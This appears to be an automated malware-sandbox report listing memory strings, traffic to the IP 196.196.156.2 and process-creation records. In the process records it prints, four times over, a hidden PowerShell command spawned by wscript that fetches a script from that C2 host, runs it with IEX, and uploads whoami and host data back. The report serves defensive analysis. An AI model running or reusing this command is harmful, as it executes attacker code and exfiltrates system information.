Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb< source: powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbF source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA208000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbr source: powershell.exe, 0000000D.00000002.3297826331.00000243AA223000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdbFz source: powershell.exe, 0000000D.00000002.3297826331.00000243AA26E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.pdbepping source: powershell.exe, 0000000D.00000002.3297826331.00000243AA26E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 0000000D.00000002.3297826331.00000243AA208000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3297826331.00000243AA250000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.3233454572.0000024390021000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32B source: powershell.exe, 0000000D.00000002.3296638948.00000243AA072000.00000004.00000020.00020000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 196.196.156.2 |
Source: powershell.exe, 00000014.00000002.4914304622.00000156B2F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:49210/page213 |
Source: powershell.exe, 00000014.00000002.4914429609.00000156B33D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:49210/page213testf8.GetByteses |
Source: powershell.exe, 0000000D.00000002.3234872421.000002439308E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393016000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881 |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024393097000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881( |
Source: powershell.exe, 00000014.00000002.4914429609.00000156B33D6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOA |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024393204000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOAh |
Source: powershell.exe, 00000014.00000002.4914304622.00000156B2F10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt |
Source: powershell.exe, 0000000D.00000002.3234458862.0000024390175000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://196.196.156.2:57881/hckoahazgdepkgkf/page213/upgrade.txt |
Source: powershell.exe, 0000000D.00000002.3234458862.0000024390175000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4913800857.00000156B15A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: svchost.exe, 00000008.00000002.4138837250.0000021918200000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/ |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567 |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg |
Source: qmgr.db.8.dr |
String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe |
Source: qmgr.db.8.dr |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.00000252901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.000002529007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1A92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024391A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F3B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2479815922.000002528197A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024391A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B2F69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: svchost.exe, 00000008.00000003.2512084051.0000021918048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr |
String found in binary or memory: https://g.live.com/odclientsettings/Prod.C: |
Source: svchost.exe, 00000008.00000003.2512084051.0000021917FE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C: |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024391C4D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000D.00000002.3234872421.0000024392BBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4914429609.00000156B3474000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: App1727703151068771400_9732F0DB-5EDA-47CD-9232-258D813B5AF5.log.4.dr |
String found in binary or memory: https://login.windows.net |
Source: powershell.exe, 00000000.00000002.2479815922.0000025280246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.00000252901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2520102751.000002529007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2479815922.0000025281C2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3234872421.0000024393432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1A92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3287856012.00000243A1BD5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.2479815922.000002528197A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep 12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep 12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);} |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep 12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep 12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);} |
|
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4468:120:WilError_03 |